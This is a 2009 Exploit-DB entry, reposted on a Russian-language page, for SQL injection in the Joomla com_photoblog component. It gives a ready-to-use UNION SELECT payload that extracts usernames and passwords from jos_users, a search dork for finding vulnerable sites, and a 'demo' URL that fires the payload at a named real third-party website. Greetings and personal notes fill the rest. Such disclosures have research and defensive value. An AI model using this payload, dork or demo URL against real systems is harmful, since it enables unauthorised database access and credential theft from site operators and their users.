- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9892
- Проверка EDB
-
- Пройдено
- Автор
- KAMTIEZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-10-23
Код:
/**************************************************************************
[~] Joomla Component com_photoblog SQL injection vulnerability - (category)
[~] Author : kaMtiEz ([email protected])
[~] Homepage : http://www.indonesiancoder.com
[~] Date : October 12, 2009
[~] Tune In : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Vendor : http://webguerilla.net/
[+] Download : http://webguerilla.net/downloads/3-components-for-joomla-1
[+] version : alpha 3 - alpha 3a
[+] Vulnerability : SQL injection
[+] Dork : inurl:"kaMtiEz"+"tukulesto"
[+] Price : FREE
===========================================================================
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_photoblog&view=blogs&category=[INDONESIANCODER]
[ Exploit ]
-666/**/union/**/select/**/6,concat(0x3a,username,password),6,6,version(),6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*
[ Demo ]
http://www.wideskygroup.com/index.php?option=com_photoblog&view=blogs&category=-666/**/union/**/select/**/6,concat%280x3a,username,password%29,6,6,version%28%29,6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM - KILL-9 CREW - KIRIK CREW - MainHack Brotherhood - ServerIsDown
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s ,rendy, Jack- and YOU!!
[ NOTE ]
[+] Mom and dad and my sister i love u .. for my girlfriends thx for your support mwahhhh ^_^
[+] setelah bertapa bersama om tukulesto .. akhirnya .. mendapatkan bugs lagi !
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D
[ QUOTE ]
[+] M3NW5 kemana aje lo ?? kangen nih .. hha
[+] AURAKASIH dont leave me ...
- Источник
- www.exploit-db.com